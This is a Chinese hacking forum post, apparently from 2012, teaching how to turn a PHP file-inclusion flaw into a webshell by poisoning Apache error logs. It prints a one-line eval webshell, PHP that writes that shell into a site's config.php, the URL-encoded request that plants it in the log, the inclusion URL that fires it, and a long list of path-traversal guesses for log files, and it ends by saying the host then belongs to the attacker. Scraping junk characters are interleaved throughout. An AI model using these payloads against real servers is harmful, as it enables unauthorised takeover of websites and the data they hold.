找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2370|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 7 w7 i7 X. W$ C
* p1 S4 w: ~" e. M' P# l8 S
比如还是这句一句话木马
) ], v( o' `0 p! x, O" A5 V0 @<?eval($_POST[cmd]);?>   
, }8 O  ]' a8 R0 p: d& V4 Y  {3 d, Z. \, c
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
: r  w& E9 Y. ]( Vfopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 $ `+ [# y' U: [7 g1 h% h8 N: I

0 D& x' T) y( O. n9 h3 |1 B: H<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
% F% Q3 _+ w$ p% r8 u9 R+ S. g5 B: \& B: yfclose($fp);?>   //在config.php里写入一句木马语句
# p6 g6 T2 ^& d2 N* H$ `4 B
9 L  V3 A( P/ Q+ [7 z1 Z& m8 U我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 & x  R9 Y" M! ~4 B3 ~& f
转换为 % }3 _. |8 Q5 ^# j$ `9 Y' l4 A; J
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
# ^! J6 w& F& Y* }7 bconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
* m7 f& O2 M" G%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
0 f3 ]$ }5 j* j; |" X. A. cfclose%28%24fp%29%3B%3F%3E / T9 D0 N3 [9 f* o, a. E
我们提交 & a$ \7 u$ Y" `
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww $ Q! {5 }$ n% {, u
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp / v! N3 K& r3 q! l) r
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B 1 T- U& G4 ~: o# j9 I# d: j4 W0 z) y
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
( h& P" o) K9 U" s2 R4 p, L' o: j, {( [4 I
4 _, s6 r. Z! i( h' B* H这样就错误日志里就记录下了这行写入webshell的代码。
9 h" i0 N! [' J, M; v5 Z* ]我们再来包含日志,提交
4 r  W: T  i% n. I' I+ n% xhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log 9 w; J% G" I% [( _

- E3 R2 a. I, ]  f& s这样webshell就写入成功了,config.php里就写入一句木马语句
1 F9 a( b; n3 n: v0 g. tOK.
' b$ A, P$ G5 Chttp://www.xxx.com/forum/config.php这个就成了我们的webshell ; u7 d# u0 u9 W
直接用lanker的客户端一连,主机就是你的了。
2 G" ?% L- \: N
9 z( X' T5 F9 b, _PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
- `: L2 r- N" D! o* ]: I# o3 W* Z# `" w9 a4 g7 S
其他的日志路径,你可以去猜,也可以参照这里。
, \+ D. ^% r3 j, t; a../../../../../../../../../../var/log/httpd/access_log
7 N* ?% {9 X5 U& B, Q  C../../../../../../../../../../var/log/httpd/error_log
1 i5 O& ]. N9 l9 k' U+ Q& @$ L../apache/logs/error.log
4 Y  }: w) f, p../apache/logs/access.log
7 Y, b+ l* {1 w6 d* {6 {3 A) i../../apache/logs/error.log ; Y( W* X+ j2 s* ~6 S5 a( ^* o" B
../../apache/logs/access.log
! @% S2 Z! a$ O) Y../../../apache/logs/error.log 1 y0 Q5 U" W  M  G* u
../../../apache/logs/access.log 2 P3 `0 R5 ~6 \9 X* S
../../../../../../../../../../etc/httpd/logs/acces_log + o+ ?, z" g: C' l
../../../../../../../../../../etc/httpd/logs/acces.log % U) ^# p4 k! M
../../../../../../../../../../etc/httpd/logs/error_log ) ?  X) O1 m/ q, W" o, S
../../../../../../../../../../etc/httpd/logs/error.log   [' d* V3 v# P; l# w, q- y
../../../../../../../../../../var/www/logs/access_log % O: r$ x. W; @+ c) x% n. H
../../../../../../../../../../var/www/logs/access.log . x% f1 U- m, }$ E
../../../../../../../../../../usr/local/apache/logs/access_log
& ]3 o9 ]" x% O2 n3 i% C../../../../../../../../../../usr/local/apache/logs/access.log & A1 P& M! e: Z4 p7 k
../../../../../../../../../../var/log/apache/access_log
0 l2 a0 `! S4 v+ U% m4 J../../../../../../../../../../var/log/apache/access.log
/ |6 x% k2 l5 s# V6 W$ c../../../../../../../../../../var/log/access_log - ^4 M  S3 i- ?5 f' ^/ K. ?: X2 |
../../../../../../../../../../var/www/logs/error_log * f& J  j  P% U5 \5 a1 f* |9 g
../../../../../../../../../../var/www/logs/error.log / y& y$ F3 u+ q
../../../../../../../../../../usr/local/apache/logs/error_log * ~* Z& y1 j6 U. q$ E0 P
../../../../../../../../../../usr/local/apache/logs/error.log 7 d/ G# |" O! {7 X  u
../../../../../../../../../../var/log/apache/error_log
: n9 N# A) v6 U/ N3 P" H, S../../../../../../../../../../var/log/apache/error.log
- K, M3 p/ v0 ?, f../../../../../../../../../../var/log/access_log
5 O+ e- x$ @, V/ Y/ K! r../../../../../../../../../../var/log/error_log / d# Y# p" ~, x4 a% S5 o1 ?
/var/log/httpd/access_log       - _# g5 C6 \. A1 }& q! H3 u
/var/log/httpd/error_log     9 C% J, }  P% H7 \# q! _2 u6 K
../apache/logs/error.log     
9 U4 H/ Y' j6 R" |7 j1 F  x$ w../apache/logs/access.log
- a  a6 R; ]+ W* L& f../../apache/logs/error.log * {$ b+ G, a! ]# _" n' H4 _+ G: q
../../apache/logs/access.log
/ x4 E% ~, v1 `. d- h9 x../../../apache/logs/error.log
  F) t. u4 @' h9 a& Y$ c" q8 y1 \- G- G../../../apache/logs/access.log
8 H8 _9 @# q* l. s& g/etc/httpd/logs/acces_log * m% v; s( O4 E  H3 K
/etc/httpd/logs/acces.log
' ?. j& ^# }$ x3 f7 x/etc/httpd/logs/error_log
5 |1 @; _: [% F/etc/httpd/logs/error.log & f  [, i7 ]' W, }2 X$ f
/var/www/logs/access_log
, z# ^) m% T( O% }/var/www/logs/access.log
& @* T1 P6 ~% S/usr/local/apache/logs/access_log / M; p8 W% o3 R4 M" j$ F
/usr/local/apache/logs/access.log
# m0 I7 G. x4 t$ z: q% P, c/var/log/apache/access_log 3 W2 n+ g# P9 }; c( g( i8 u1 `
/var/log/apache/access.log
: H& j# n  d# \# i; l" n/var/log/access_log
, v3 N; P, L$ ^* m' r  x/var/www/logs/error_log
/ P) e+ o8 O' `5 {/var/www/logs/error.log ) m! \- P; ~0 a5 f( k9 y% G
/usr/local/apache/logs/error_log 6 y2 c% l, w9 u7 U) v9 o
/usr/local/apache/logs/error.log 7 C6 i$ f6 v2 S1 U1 z: e7 a: S
/var/log/apache/error_log ) Q* j6 H9 L; @& H
/var/log/apache/error.log
9 ?7 ?) i" @2 C, q% x2 y/var/log/access_log
5 [7 n5 K1 b. [: D/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表